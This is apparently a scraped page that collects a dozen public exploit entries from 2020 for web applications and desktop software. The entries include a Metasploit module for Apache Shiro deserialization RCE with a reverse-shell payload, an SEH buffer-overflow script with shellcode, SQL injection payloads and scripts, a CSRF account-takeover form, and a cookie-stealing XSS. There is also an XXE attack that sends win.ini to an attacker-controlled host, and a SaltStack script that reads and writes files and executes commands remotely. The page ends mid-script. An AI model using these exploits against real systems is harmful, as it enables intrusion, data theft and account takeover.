HireHackking

# Exploit Title: Online Scheduling System 1.0 - Authentication Bypass # Exploit Author: Bobby Cooke # Date: 2020-04-30 # Vendor Homepage: https://www.sourcecodester.com/php/14168/online-scheduling-system.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-scheduling-system.zip # Version: 1.0 # Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4 # Malicious POST Request to https://TARGET/Online%20Scheduling%20System/login.php HTTP/1.1 POST /Online%20Scheduling%20System/login.php HTTP/1.1 Host: TARGET Connection: close Cookie: PHPSESSID=8o12pka3gvais768f43v5q4d60 username=0&password=0&lgn=Login

# Exploit Title: Apache OFBiz 17.12.03 - Cross-Site Request Forgery (Account Takeover) # Exploit Author: Faiz Ahmed Zaidi # Vendor Homepage: [https://ofbiz.apache.org/security.html] # Software Link: https://ofbiz.apache.org/download.html#security # Version: Before 17.12.03 # Tested on: Linux and Windows # CVE : CVE-2019-0235 #Exploit Code: <html> <body> <form action="https://hostipaddress:8443/partymgr/control/updateEmailAddress" method="POST"> <input type="hidden" name="contactMechId" value="admin" /> <input type="hidden" name="contactMechTypeId" value="EMAIL&#95;ADDRESS" /> <input type="hidden" name="partyId" value="admin" /> <input type="hidden" name="DONE&#95;PAGE" value="viewprofile&#63;party&#95;id&#61;adminâ&#136;&#130;yId&#61;admin" /> <input type="hidden" name="emailAddress" value="attackeremail@id.com" /> <input type="hidden" name="allowSolicitation" value="Y" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html> After that do a password reset via forget password. It's done :)

# Title: HardDrive 2.1 for iOS - Arbitrary File Upload # Author: Vulnerability Laboratory # Date: 2020-04-30 # Software: https://apps.apple.com/ch/app/harddrive/id383226784 # CVE: N/A Document Title: =============== HardDrive v2.1 iOS - Arbitrary File Upload Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2221 Common Vulnerability Scoring System: ==================================== 7.4 Product & Service Introduction: =============================== Store+Organize+Edit+Protect+Import+Download+View+Share your files right from your iPhone! Transform your iPhone/iPod touch into a real HardDrive with no extra cable or software. (Copy of the Homepage: https://apps.apple.com/ch/app/harddrive/id383226784 ) Affected Product(s): ==================== Sebastien BUET HardDrive v2.1 - Apple iOS Mobile Web Application Vulnerability Disclosure Timeline: ================================== 2020-04-29: Public Disclosure (Vulnerability Laboratory) Technical Details & Description: ================================ An arbitrary file upload web vulnerability has been discovered in the official Air Sender v1.0.2 iOS mobile application. The web vulnerability allows remote attackers to upload arbitrary files to compromise for example the file system of a service. The arbitrary upload vulnerability is located in the within the web-server configuration when using the upload module. Remote attackers are able to bypass the local web-server configuration by an upload of malicious webshells. Attackers are able to inject own files with malicious `filen` values in the `upload` POST method request to compromise the mobile web-application. The application does not perform checks for multiple file extensions. Thus allows an attacker to upload for example to upload a html.js.png file. After the upload the attacker requests the original url source with the uploaded file and removes the unwanted extension to execute the code in the unprotected web-frontend. The security risk of the vulnerability is estimated as high with a common vulnerability scoring system count of 7.0. Exploitation of the web vulnerability requires a low privilege ftp application user account and no user interaction. Successful exploitation of the arbitrary file upload web vulnerability results in application or device compromise. Request Method(s): [+] POST Vulnerable Module(s): [+] ./upload Vulnerable File(s): [+] file Proof of Concept (PoC): ======================= The arbitrary file upload web vulnerability can be exploited by remote attackers without user interaction or privileged user accounts. For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue. PoC: Vulnerable Source (File Dir Listing Index) <tr><td width="100px" valign="middle" align="left"><img src="exploit.html"></td><td width="300px" valign="middle" align="left"> <a href="exploit.html.js">exploit.html.js</a></td> <td width="454px" valign="middle" align="left"> <em valign="middle" align="center">size: 256.7 Kb PoC: Exploitation http://localhost:50071/exploit.html.js --- PoC Session Logs [POST] --- (file) http://localhost:50071/ Host: localhost:50071 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------9331569428946906291010349387 Content-Length: 263181 Origin: http://localhost:50071 Connection: keep-alive Referer: http://localhost:50071/ file=exploit.html.js.png&button=Submit POST: HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 381654 - http://localhost:50071/exploit.html.js Host: localhost:50071 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: image/webp,*/* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive - http://localhost:50071/exploit.html GET: HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 366735 Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. -- VULNERABILITY LABORATORY - RESEARCH TEAM

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Powershell def initialize(info={}) super(update_info(info, 'Name' => 'Apache Shiro v1.2.4 Cookie RememberME Deserial RCE', 'Description' => %q{ This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apache Shiro v1.2.4. }, 'License' => MSF_LICENSE, 'Author' => [ 'L / l-codes[at]qq.com' # Metasploit module ], 'References' => [ ['CVE', '2016-4437'], ['URL', 'https://github.com/Medicean/VulApps/tree/master/s/shiro/1'] ], 'Platform' => %w{ win unix }, 'Arch' => [ ARCH_CMD ], 'Targets' => [ [ 'Unix Command payload', 'Arch' => ARCH_CMD, 'Platform' => 'unix', 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_bash'} ], [ 'Windows Command payload', 'Arch' => ARCH_CMD, 'Platform' => 'win' ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 7 2016', 'Privileged' => false, 'DefaultOptions' => { 'WfsDelay' => 5 } ) ) register_options( [ OptString.new('TARGETURI', [ true, 'Base directory path', '/']) ]) end def aes_encrypt(payload) aes = OpenSSL::Cipher.new('aes-128-cbc') aes.encrypt aes.key = Rex::Text.decode_base64('kPH+bIxk5D2deZiIxcaaaA==') aes.random_iv + aes.update(payload) + aes.final end def exploit cmd = payload.encoded vprint_status("Execute CMD: #{cmd}") type = ( target.name == 'Unix Command payload' ? 'bash' : 'cmd' ) java_payload = ::Msf::Util::JavaDeserialization.ysoserial_payload('CommonsCollections2', cmd, modified_type: type) ciphertext = aes_encrypt(java_payload) base64_ciphertext = Rex::Text.encode_base64(ciphertext) send_request_cgi({ 'uri' => target_uri.path, 'method' => 'GET', 'cookie' => "rememberMe=#{base64_ciphertext}" }) end end

# Exploit Title: BoltWire 6.03 - Local File Inclusion # Date: 2020-05-02 # Exploit Author: Andrey Stoykov # Vendor Homepage: https://www.boltwire.com/ # Software Link: https://www.boltwire.com/downloads/go&v=6&r=03 # Version: 6.03 # Tested on: Ubuntu 20.04 LAMP LFI: Steps to Reproduce: 1) Using HTTP GET request browse to the following page, whilst being authenticated user. http://192.168.51.169/boltwire/index.php?p=action.search&action=../../../../../../../etc/passwd Result root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin [SNIPPED]

# Title: Fishing Reservation System 7.5 - 'uid' SQL Injection # Author: Vulnerability Laboratory # Date: 2020-05-05 # Vendor: https://fishingreservationsystem.com/index.html # Software: https://fishingreservationsystem.com/features.htm # CVE: N/A Document Title: =============== Fishing Reservation System - Multiple Remote SQL Injection Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2243 Common Vulnerability Scoring System: ==================================== 7.5 Product & Service Introduction: =============================== (Copy of the Homepage: https://fishingreservationsystem.com/index.html & https://fishingreservationsystem.com/features.htm ) Vulnerability Disclosure Timeline: ================================== 2020-05-04: Public Disclosure (Vulnerability Laboratory) Technical Details & Description: ================================ Multiple remote sql-injection web vulnerabilities has been discovered in the official Fishing Reservation System application. The vulnerability allows remote attackers to inject or execute own sql commands to compromise the dbms or file system of the application. The remote sql injection web vulnerabilites are located in the pid, type and uid parameters of the admin.php control panel file. Guest accounts or low privileged user accounts are able to inject and execute own malicious sql commands as statement to compromise the local database and affected management system. The request method to inject/execute is GET and the attack vector is client-side. The vulnerability is a classic order by remote sql injection web vulnerability. Exploitation of the remote sql injection vulnerability requires no user interaction and a low privileged web-application user / guest account. Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise. Request Method(s): [+] GET Vulnerable File(s): [+] cart.php [+] calender.php [+] admin.php Vulnerable Parameter(s): [+] uid [+] pid [+] type [+] m [+] y [+] code Proof of Concept (PoC): ======================= The remote sql-injection web vulnerability can be exploited by remote attackers with guest access or low privileged user account and without user interaction action. For security demonstration or to reproduce the remote sql injection web vulnerability follow the provided information and steps below to continue. PoC: Example https://frs.localhost:8080/system/admin.php?page=product/edit&type=s&pid='[SQL-INJECTION!]-- https://frs.localhost:8080/system/admin.php?page=product/edit&type='[SQL-INJECTION!]-- https://frs.localhost:8080/system/admin.php?page=user/edit&uid='[SQL-INJECTION!]--&PHPSESSID= - https://frs.localhost:8080/system/calendar.php?m='[SQL-INJECTION!]--&y=20&PHPSESSID= https://frs.localhost:8080/system/calendar.php?m=02&y='[SQL-INJECTION!]--&PHPSESSID= https://frs.localhost:8080/system/modules/cart.php?code='[SQL-INJECTION!]--&PHPSESSID= PoC: Exploitation (SQL-Injection) https://frs.localhost:8080/system/admin.php?page=product/edit&type=s&pid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID= https://frs.localhost:8080/system/admin.php?page=product/edit&type=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&pid=2&PHPSESSID= https://frs.localhost:8080/system/admin.php?page=user/edit&uid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID= - https://frs.localhost:8080/system/calendar.php?m=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&y=20&PHPSESSID= https://frs.localhost:8080/system/calendar.php?m=02&y=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID= https://frs.localhost:8080/system/modules/cart.php?code=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID= PoC: Exploit <html> <head><body> <title>Fishing Reservation System - SQL INJECTION EXPLOIT (PoC)</title> <iframe src="https://frs.localhost:8080/system/admin.php?page=product/edit&type=s& pid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID="%20> <iframe src="https://frs.localhost:8080/system/admin.php?page=product/edit& type=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&pid=2&PHPSESSID="%20> <iframe src="https://frs.localhost:8080/system/admin.php?page=user/edit& uid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID="%20> <br>- <iframe src="https://frs.localhost:8080/system/calendar.php? m=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&y=20&PHPSESSID="%20> <iframe src="https://frs.localhost:8080/system/calendar.php?m=02& y=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID="%20> <iframe src="https://frs.localhost:8080/system/modules/cart.php? code=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID="%20> </body></head> </html> Reference(s): https://frs.localhost:8080/ https://frs.localhost:8080/system/ https://frs.localhost:8080/system/modules/ https://frs.localhost:8080/system/admin.php https://frs.localhost:8080/system/modules/cart.php Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. -- VULNERABILITY LABORATORY - RESEARCH TEAM

# Exploit Title: Frigate 3.36 - Buffer Overflow (SEH) # Exploit Author: Xenofon Vassilakopoulos # Date: 2020-05-03 # Version: 3.36 # Vendor Homepage: http://www.Frigate3.com/ # Software Link Download: http://www.Frigate3.com/download/Frigate3_Std_v36.exe # Tested on: Windows 7 Professional SP1 x86 # Steps to reproduce : # 1. generate the test.txt using this exploit # 2. copy the contents of the test.txt to clipboard # 3. open Frigate3 then go to Disk -> Find Computer # 4. paste the contents to computer name # 5. calculator will execute import struct filename = 'test.txt' junk = "A"*4112 nseh = "\xeb\x1A\x90\x90" seh = struct.pack('L',0x40171c45) # pop esi # pop ebx # ret nop="\x90"*18 junk2 = "\x71\x71\x90\x90" #msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed -b "\x00\x14\x09\x0a\x0d" -f python buf = b"" buf += b"\x89\xe7\xda\xc7\xd9\x77\xf4\x5a\x4a\x4a\x4a\x4a\x4a" buf += b"\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37" buf += b"\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41" buf += b"\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58" buf += b"\x50\x38\x41\x42\x75\x4a\x49\x79\x6c\x68\x68\x6d\x52" buf += b"\x77\x70\x63\x30\x73\x30\x35\x30\x6d\x59\x38\x65\x34" buf += b"\x71\x69\x50\x70\x64\x4c\x4b\x56\x30\x44\x70\x6e\x6b" buf += b"\x36\x32\x74\x4c\x6c\x4b\x30\x52\x76\x74\x4e\x6b\x71" buf += b"\x62\x51\x38\x64\x4f\x78\x37\x42\x6a\x45\x76\x76\x51" buf += b"\x4b\x4f\x6e\x4c\x47\x4c\x43\x51\x63\x4c\x44\x42\x36" buf += b"\x4c\x61\x30\x6f\x31\x38\x4f\x56\x6d\x45\x51\x69\x57" buf += b"\x38\x62\x6c\x32\x63\x62\x33\x67\x4e\x6b\x76\x32\x42" buf += b"\x30\x4e\x6b\x50\x4a\x75\x6c\x4c\x4b\x42\x6c\x57\x61" buf += b"\x51\x68\x6a\x43\x73\x78\x63\x31\x6a\x71\x43\x61\x6e" buf += b"\x6b\x73\x69\x37\x50\x35\x51\x78\x53\x6e\x6b\x42\x69" buf += b"\x65\x48\x4a\x43\x36\x5a\x51\x59\x4e\x6b\x46\x54\x4c" buf += b"\x4b\x53\x31\x69\x46\x70\x31\x49\x6f\x4c\x6c\x4f\x31" buf += b"\x48\x4f\x66\x6d\x45\x51\x4f\x37\x66\x58\x49\x70\x63" buf += b"\x45\x5a\x56\x36\x63\x73\x4d\x7a\x58\x65\x6b\x63\x4d" buf += b"\x34\x64\x44\x35\x4a\x44\x63\x68\x4c\x4b\x33\x68\x44" buf += b"\x64\x66\x61\x38\x53\x52\x46\x4e\x6b\x34\x4c\x50\x4b" buf += b"\x6e\x6b\x43\x68\x75\x4c\x76\x61\x6e\x33\x4e\x6b\x55" buf += b"\x54\x6e\x6b\x53\x31\x38\x50\x4f\x79\x43\x74\x37\x54" buf += b"\x76\x44\x51\x4b\x31\x4b\x53\x51\x36\x39\x50\x5a\x32" buf += b"\x71\x79\x6f\x79\x70\x43\x6f\x53\x6f\x52\x7a\x4e\x6b" buf += b"\x67\x62\x48\x6b\x4e\x6d\x43\x6d\x72\x4a\x47\x71\x6e" buf += b"\x6d\x4d\x55\x4e\x52\x57\x70\x37\x70\x67\x70\x62\x70" buf += b"\x32\x48\x70\x31\x6e\x6b\x32\x4f\x6c\x47\x39\x6f\x69" buf += b"\x45\x4d\x6b\x58\x70\x4e\x55\x4d\x72\x51\x46\x30\x68" buf += b"\x4e\x46\x6f\x65\x4d\x6d\x6d\x4d\x6b\x4f\x39\x45\x45" buf += b"\x6c\x33\x36\x53\x4c\x37\x7a\x4b\x30\x49\x6b\x49\x70" buf += b"\x32\x55\x45\x55\x6d\x6b\x33\x77\x44\x53\x42\x52\x50" buf += b"\x6f\x43\x5a\x67\x70\x33\x63\x4b\x4f\x59\x45\x42\x43" buf += b"\x65\x31\x52\x4c\x45\x33\x35\x50\x41\x41" payload = junk + nseh + seh + nop + junk2 + buf print "[+] Creating file %s" % filename with open(filename, 'w') as f: f.write(payload) print " File created, wrote %d bytes to file" % len(payload)

# Title: addressbook 9.0.0.1 - 'id' SQL Injection # Date: 2020-04-01 # Author: David Velazquez a.k.a. d4sh&r000 # vulnerable application: https://sourceforge.net/projects/php-addressbook/files/latest/download # vulnerable version: 9.0.0.1 # Discription: addressbook 9.0.0.1 time-based blind SQL injection # Tested On: Ubuntu Server 20.04 LTS # Platform: PHP # Type: webapp # Use: # addressbook9-SQLi.py #http://127.0.0.1/photo.php?id=1' #!/usr/bin/env python # -*- coding: utf-8 -*- import sys import requests def isVulnerable(URL): """Check if the URL is vulnerable to ime-based blind SQL injection""" response = requests.get(URL+'%27%20AND%20(SELECT%207812%20FROM%20(SELECT(SLEEP(5)))MkTv)%20AND%20%27nRZy%27=%27nRZy') s=response.elapsed.total_seconds() if s>5:#I put a sleep sentence to test the bug sys.stdout.write('[+] Aplication is vulnerable!!!\n') else: sys.stdout.write('[+] Aplication NOT vulnerable\n') if __name__ == "__main__": isVulnerable(sys.argv[1])

# Exploit Title: Outline Service 1.3.3 - 'Outline Service ' Unquoted Service Path # Discovery by: Minh Tuan - SunCSR # Discovery Date: 2020-05-03 # Vendor Homepage: https://getoutline.org/vi/home # Software Link : https://raw.githubusercontent.com/Jigsaw-Code/outline-releases/master/client/stable/Outline-Client.exe # Tested Version: 1.3.3 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 10.0.18363 N/A Build 18363 # Step to discover Unquoted Service Path: C:\Users\minht>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ OutlineService OutlineService C:\Program Files (x86)\Outline\OutlineService.exe C:\Users\minht>sc qc OutlineService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: OutlineService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Outline\OutlineService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : OutlineService DEPENDENCIES : SERVICE_START_NAME : LocalSystem # Exploit: # A successful attempt would require the local user to be able to insert their code in the system root path # undetected by the OS or other security applications where it could potentially be executed during # application startup or reboot. If successful, the local user's code would execute with the elevated # privileges of the application.

# Title: osTicket 1.14.1 - Persistent Authenticated Cross-Site Scripting # Author: Mehmet Kelepce / Gais Cyber Security # Date : 2020-03-24 # Source Link: https://github.com/osticket/osticket/commit/fc4c8608fa122f38673b9dddcb8fef4a15a9c884 # Vendor: http://osticket.com # Remotely Exploitable: Yes # Dynamic Coding Language: PHP # CVSSv3 Base Score: 7.4 (AV:N, AC:L, PR:L, UI:N, S:C, C:L, I:L, A:L) ## this vulnerability was found by examining the source code. PoC : Ticket SLA Plan Name - HTTP POST REQUEST ########################################################## POST /upload/scp/slas.php?id=1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/upload/scp/slas.php?id=1 Content-Type: application/x-www-form-urlencoded Content-Length: 196 Connection: close Cookie: cookie=3333; OSTSESSID=684d6hn7dfk869kupbhc9hq2qv Upgrade-Insecure-Requests: 1 submit=Save+Changes&__CSRFToken__=6174a3343a6277b2e5faae240188d54624a756d7&do=update&a=&id=1&name=%3Csvg+onload%3Dconfirm%28document.cookie%29%3B%3E&isactive=1&grace_period=48&schedule_id=0&notes= Vulnerable parameter: name Parameter file: /scp/slass.php I used the name of the SLA for any ticket. ## Risk : cookie information of the target user is obtained.

# Title: BlogEngine 3.3 - 'syndication.axd' XML External Entity Injection # Author: Daniel Martinez Adan (aDoN90) # Date: 2020-05-01 # Homepage: https://blogengine.io/ # Software Link: https://blogengine.io/support/download/ # Affected Versions: 3.3 # Vulnerability: XML External Entity (XXE OOB) Injection Vulnerability # Severity: High # Status: Fixed # Author: Daniel Martinez Adan (aDoN90) # CVSS Score (3.0): CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H Technical Details -------------------- Url: http://websiteurl-blogengine3.3/syndication.axd Parameter Name: apml Parameter Type: GET *Attack Pattern 1 (SSRF HTTP Interaction) :* http://websiteurl-blogengine3.3/syndication.axd?apml=http://hav4zt9bu9ihxzvcg59lqfapzg5it7.burpcollaborator.net *Attack Pattern 2 (SSRF to XXE HTTP Interaction):* http://b5baa301-b569-4bbf-afd9-d2eb264fdcbf.gdsdemo.com/blog/syndication.axd?apml=http://attackerip:8000/miau.txt miau.txt ----------------------------- <!DOCTYPE foo SYSTEM " ">http://dgx2pxtwxkvgvkubo7ksvkywtnzhn6.burpcollaborator.net"> <http://dgx2pxtwxkvgvkubo7ksvkywtnzhn6.burpcollaborator.net> ----------------------------- [image: image.png] *Attack Pattern 3 (SSRF to XXE Exfiltration):* miau.txt ----------------------------- <?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM "http://37.187.112.19:8000/test1.dtd"> %sp; %param1; %exfil; ]> ----------------------------- test1.dtd ----------------------------- <!ENTITY % data SYSTEM "file:///c:/windows/win.ini"> <!ENTITY % param1 "<!ENTITY &#x25; exfil SYSTEM ' http://y76a7hgbrccuyclwxwcp3br74yayyn.burpcollaborator.net/?%data;'>"> -----------------------------

# Exploit Title: webERP 4.15.1 - Unauthenticated Backup File Access # Date: 2020-05-01 # Author: Besim ALTINOK # Vendor Homepage: http://www.weberp.org # Software Link: https://sourceforge.net/projects/web-erp/ # Version: v4.15.1 # Tested on: Xampp # Credit: İsmail BOZKURT -------------------------------------------------------------------------- About Software: webERP is a complete web-based accounting and business management system that requires only a web-browser and pdf reader to use. It has a wide range of features suitable for many businesses particularly distributed businesses in wholesale, distribution, and manufacturing. ------------------------------------------------------- PoC Unauthenticated Backup File Access --------------------------------------------- 1- This file generates new Backup File: http://localhost/webERP/BackUpDatabase.php 2- Someone can download the backup file from: -- http://localhost/webERP/companies/weberp/Backup_2020-05-01-16-55-35.sql.gz

# Exploit Title: Online Scheduling System 1.0 - 'username' SQL Injection # Date: 2020-05-04 # Exploit Author: Saurav Shukla # Vendor Homepage: https://www.sourcecodester.com/php/14168/online-scheduling-system.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-scheduling-system.zip # Version: 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 --------------------------------------------------------------------------------- #parameter Vulnerable: username # Injected Request POST /oss/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 55 Origin: http://localhost Connection: close Referer: http://localhost/oss/Register.php Cookie: PHPSESSID=091v1e2g6109rrbduk924psea9 Upgrade-Insecure-Requests: 1 username=admin' and sleep(50)--+&password=admin&lgn=Add

# Exploit Title: Saltstack 3000.1 - Remote Code Execution # Date: 2020-05-04 # Exploit Author: Jasper Lievisse Adriaanse # Vendor Homepage: https://www.saltstack.com/ # Version: < 3000.2, < 2019.2.4, 2017.*, 2018.* # Tested on: Debian 10 with Salt 2019.2.0 # CVE : CVE-2020-11651 and CVE-2020-11652 # Discription: Saltstack authentication bypass/remote code execution # # Source: https://github.com/jasperla/CVE-2020-11651-poc # This exploit is based on this checker script: # https://github.com/rossengeorgiev/salt-security-backports #!/usr/bin/env python # # Exploit for CVE-2020-11651 and CVE-2020-11652 # Written by Jasper Lievisse Adriaanse (https://github.com/jasperla/CVE-2020-11651-poc) # This exploit is based on this checker script: # https://github.com/rossengeorgiev/salt-security-backports from __future__ import absolute_import, print_function, unicode_literals import argparse import datetime import os import os.path import sys import time import salt import salt.version import salt.transport.client import salt.exceptions def init_minion(master_ip, master_port): minion_config = { 'transport': 'zeromq', 'pki_dir': '/tmp', 'id': 'root', 'log_level': 'debug', 'master_ip': master_ip, 'master_port': master_port, 'auth_timeout': 5, 'auth_tries': 1, 'master_uri': 'tcp://{0}:{1}'.format(master_ip, master_port) } return salt.transport.client.ReqChannel.factory(minion_config, crypt='clear') # --- check funcs ---- def check_connection(master_ip, master_port, channel): print("[+] Checking salt-master ({}:{}) status... ".format(master_ip, master_port), end='') sys.stdout.flush() # connection check try: channel.send({'cmd':'ping'}, timeout=2) except salt.exceptions.SaltReqTimeoutError: print("OFFLINE") sys.exit(1) else: print("ONLINE") def check_CVE_2020_11651(channel): print("[+] Checking if vulnerable to CVE-2020-11651... ", end='') sys.stdout.flush() try: rets = channel.send({'cmd': '_prep_auth_info'}, timeout=3) except: print('ERROR') return None else: pass finally: if rets: print('YES') root_key = rets[2]['root'] return root_key print('NO') return None def check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path): print("[+] Checking if vulnerable to CVE-2020-11652 (read_token)... ", end='') sys.stdout.flush() # try read file msg = { 'cmd': 'get_token', 'arg': [], 'token': top_secret_file_path, } try: rets = channel.send(msg, timeout=3) except salt.exceptions.SaltReqTimeoutError: print("YES") except: print("ERROR") raise else: if debug: print() print(rets) print("NO") def check_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key): print("[+] Checking if vulnerable to CVE-2020-11652 (read)... ", end='') sys.stdout.flush() # try read file msg = { 'key': root_key, 'cmd': 'wheel', 'fun': 'file_roots.read', 'path': top_secret_file_path, 'saltenv': 'base', } try: rets = channel.send(msg, timeout=3) except salt.exceptions.SaltReqTimeoutError: print("TIMEOUT") except: print("ERROR") raise else: if debug: print() print(rets) if rets['data']['return']: print("YES") else: print("NO") def check_CVE_2020_11652_write1(debug, channel, root_key): print("[+] Checking if vulnerable to CVE-2020-11652 (write1)... ", end='') sys.stdout.flush() # try read file msg = { 'key': root_key, 'cmd': 'wheel', 'fun': 'file_roots.write', 'path': '../../../../../../../../tmp/salt_CVE_2020_11652', 'data': 'evil', 'saltenv': 'base', } try: rets = channel.send(msg, timeout=3) except salt.exceptions.SaltReqTimeoutError: print("TIMEOUT") except: print("ERROR") raise else: if debug: print() print(rets) pp(rets) if rets['data']['return'].startswith('Wrote'): try: os.remove('/tmp/salt_CVE_2020_11652') except OSError: print("Maybe?") else: print("YES") else: print("NO") def check_CVE_2020_11652_write2(debug, channel, root_key): print("[+] Checking if vulnerable to CVE-2020-11652 (write2)... ", end='') sys.stdout.flush() # try read file msg = { 'key': root_key, 'cmd': 'wheel', 'fun': 'config.update_config', 'file_name': '../../../../../../../../tmp/salt_CVE_2020_11652', 'yaml_contents': 'evil', 'saltenv': 'base', } try: rets = channel.send(msg, timeout=3) except salt.exceptions.SaltReqTimeoutError: print("TIMEOUT") except: print("ERROR") raise else: if debug: print() print(rets) if rets['data']['return'].startswith('Wrote'): try: os.remove('/tmp/salt_CVE_2020_11652.conf') except OSError: print("Maybe?") else: print("YES") else: print("NO") def pwn_read_file(channel, root_key, path, master_ip): print("[+] Attemping to read {} from {}".format(path, master_ip)) sys.stdout.flush() msg = { 'key': root_key, 'cmd': 'wheel', 'fun': 'file_roots.read', 'path': path, 'saltenv': 'base', } rets = channel.send(msg, timeout=3) print(rets['data']['return'][0][path]) def pwn_upload_file(channel, root_key, src, dest, master_ip): print("[+] Attemping to upload {} to {} on {}".format(src, dest, master_ip)) sys.stdout.flush() try: fh = open(src, 'rb') payload = fh.read() fh.close() except Exception as e: print('[-] Failed to read {}: {}'.format(src, e)) return msg = { 'key': root_key, 'cmd': 'wheel', 'fun': 'file_roots.write', 'saltenv': 'base', 'data': payload, 'path': dest, } rets = channel.send(msg, timeout=3) print('[ ] {}'.format(rets['data']['return'])) def pwn_exec(channel, root_key, cmd, master_ip, jid): print("[+] Attemping to execute {} on {}".format(cmd, master_ip)) sys.stdout.flush() msg = { 'key': root_key, 'cmd': 'runner', 'fun': 'salt.cmd', 'saltenv': 'base', 'user': 'sudo_user', 'kwarg': { 'fun': 'cmd.exec_code', 'lang': 'python', 'code': "import subprocess;subprocess.call('{}',shell=True)".format(cmd) }, 'jid': jid, } try: rets = channel.send(msg, timeout=3) except Exception as e: print('[-] Failed to 